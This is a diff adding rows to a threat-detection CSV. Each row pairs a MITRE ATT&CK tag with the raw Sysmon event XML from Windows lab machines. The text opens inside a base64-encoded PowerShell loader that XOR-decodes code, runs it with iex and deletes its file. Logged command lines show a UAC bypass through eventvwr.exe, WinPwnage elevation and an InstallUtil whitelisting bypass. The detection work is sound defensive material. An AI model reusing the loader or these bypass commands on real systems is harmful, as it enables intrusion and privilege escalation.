wB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1088] Bypass User Account Control - Process,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-09T01:59:29.090897Z"">
+    </TimeCreated>
+    <EventRecordID>11116</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1980"" ThreadID=""1904"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-09 01:59:28.903</Data>
+    <Data Name=""ProcessGuid"">365ABB72-8980-5CD3-0000-0010134D1F00</Data>
+    <Data Name=""ProcessId"">3840</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-863B-5CD3-0000-00204A390100</Data>
+    <Data Name=""LogonId"">0x1394a</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-8980-5CD3-0000-00105F451F00</Data>
+    <Data Name=""ParentProcessId"">3884</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\eventvwr.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\eventvwr.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-09T01:59:29.090897Z"">
+    </TimeCreated>
+    <EventRecordID>11116</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1980"" ThreadID=""1904"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-09 01:59:28.903</Data>
+    <Data Name=""ProcessGuid"">365ABB72-8980-5CD3-0000-0010134D1F00</Data>
+    <Data Name=""ProcessId"">3840</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-863B-5CD3-0000-00204A390100</Data>
+    <Data Name=""LogonId"">0x1394a</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-8980-5CD3-0000-00105F451F00</Data>
+    <Data Name=""ParentProcessId"">3884</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\eventvwr.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\eventvwr.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558969964.055762,2019-05-27T19:12:44.055762+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=&quot;VSS&quot;) get state ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T15:12:43.990983Z"">
+    </TimeCreated>
+    <EventRecordID>6171</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""980"" ThreadID=""2220"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 15:12:43.969</Data>
+    <Data Name=""ProcessGuid"">365ABB72-FE6B-5CEB-0000-00102A090C00</Data>
+    <Data Name=""ProcessId"">1536</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=&quot;VSS&quot;) get state</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
+    <Data Name=""ParentProcessId"">1944</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1558969964.055762,2019-05-27T19:12:44.055762+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=&quot;VSS&quot;) get state ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T15:12:43.990983Z"">
+    </TimeCreated>
+    <EventRecordID>6171</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""980"" ThreadID=""2220"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 15:12:43.969</Data>
+    <Data Name=""ProcessGuid"">365ABB72-FE6B-5CEB-0000-00102A090C00</Data>
+    <Data Name=""ProcessId"">1536</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=&quot;VSS&quot;) get state</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
+    <Data Name=""ParentProcessId"">1944</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1557621155.258262,2019-05-12T04:32:35.258262+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( &quot;C:\Windows\System32\schtasks.exe&quot; /run /tn elevator ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T00:32:35.258262Z"">
+    </TimeCreated>
+    <EventRecordID>16245</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1996"" ThreadID=""1832"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 00:32:35.070</Data>
+    <Data Name=""ProcessGuid"">365ABB72-69A3-5CD7-0000-0010306F2200</Data>
+    <Data Name=""ProcessId"">3752</Data>
+    <Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Manages scheduled tasks</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\schtasks.exe&quot; /run /tn elevator</Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-5DEC-5CD7-0000-00204A380100</Data>
+    <Data Name=""LogonId"">0x1384a</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-6998-5CD7-0000-00104E422200</Data>
+    <Data Name=""ParentProcessId"">2740</Data>
+    <Data Name=""ParentImage"">C:\Python27\python.exe</Data>
+    <Data Name=""ParentCommandLine"">python  winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557670689.589507,2019-05-12T18:18:09.589507+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T14:18:03.589507Z"">
+    </TimeCreated>
+    <EventRecordID>16451</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2036"" ThreadID=""296"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 14:18:03.558</Data>
+    <Data Name=""ProcessGuid"">365ABB72-2B1B-5CD8-0000-0010CCC92500</Data>
+    <Data Name=""ProcessId"">3320</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
+    <Data Name=""LogonId"">0x1364c</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-252D-5CD8-0000-001019E20300</Data>
+    <Data Name=""ParentProcessId"">2800</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1606412291.655964,2020-11-26T21:38:11.655964+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-11-26T17:38:11.175869Z"">
+    </TimeCreated>
+    <EventRecordID>2362770</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""5900"" ThreadID=""6484"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>LAPTOP-JU4M3I0E</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-11-26 17:38:11.175</Data>
+    <Data Name=""ProcessGuid"">00247C92-E803-5FBF-0000-0010F2BFB40C</Data>
+    <Data Name=""ProcessId"">16980</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.18362.449 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">&quot;C:\windows\system32\cmd.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\windows\system32\</Data>
+    <Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
+    <Data Name=""LogonGuid"">00247C92-3404-5FBE-0000-0020E0C90600</Data>
+    <Data Name=""LogonId"">0x6c9e0</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">00247C92-E803-5FBF-0000-0010CDB9B40C</Data>
+    <Data Name=""ParentProcessId"">17336</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\taskhostw.exe</Data>
+    <Data Name=""ParentCommandLine"">taskhostw.exe $(Arg0)</Data>
+  </EventData>
+</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
+[ T1059 ] wscript or cscript runing script,1560583325.973009,2019-06-15T11:22:05.973009+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run wscript or cscript with Command Line (&quot;C:\Windows\System32\WScript.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs&quot;) and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine (&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; C:\Users\IEUser\Downloads\updatevbs.html) in directory : ( C:\Users\IEUser\Desktop\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-06-15T07:22:05.691759Z"">
+    </TimeCreated>
+    <EventRecordID>7681</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2044"" ThreadID=""2092"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-06-15 07:22:05.660</Data>
+    <Data Name=""ProcessGuid"">365ABB72-9C9D-5D04-0000-001039CE1600</Data>
+    <Data Name=""ProcessId"">172</Data>
+    <Data Name=""Image"">C:\Windows\System32\wscript.exe</Data>
+    <Data Name=""FileVersion"">5.8.7600.16385</Data>
+    <Data Name=""Description"">Microsoft ® Windows Based Script Host</Data>
+    <Data Name=""Product"">Microsoft ® Windows Script Host</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\WScript.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-98E4-5D04-0000-0020A4350100</Data>
+    <Data Name=""LogonId"">0x135a4</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C2752A6515D97D5906232828004BC54C587E6780,MD5=BA7AC4381D685354FF87E0553E950A4E,SHA256=BED1028BADEE2ADE8A8A8EDD25AA4C3E70A6BEEFAFBDFFD6426E5E467F24EB01,IMPHASH=317C8DE06F7AEE57A3ACF4722FE00983</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-9C8E-5D04-0000-0010D0421600</Data>
+    <Data Name=""ParentProcessId"">540</Data>
+    <Data Name=""ParentImage"">C:\Program Files\Internet Explorer\iexplore.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; C:\Users\IEUser\Downloads\updatevbs.html</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564435993.225412,2019-07-30T01:33:13.225412+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:13.214691Z"">
+    </TimeCreated>
+    <EventRecordID>4900</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:13.169</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6619-5D3F-0000-0010FDE78600</Data>
+    <Data Name=""ProcessId"">5116</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
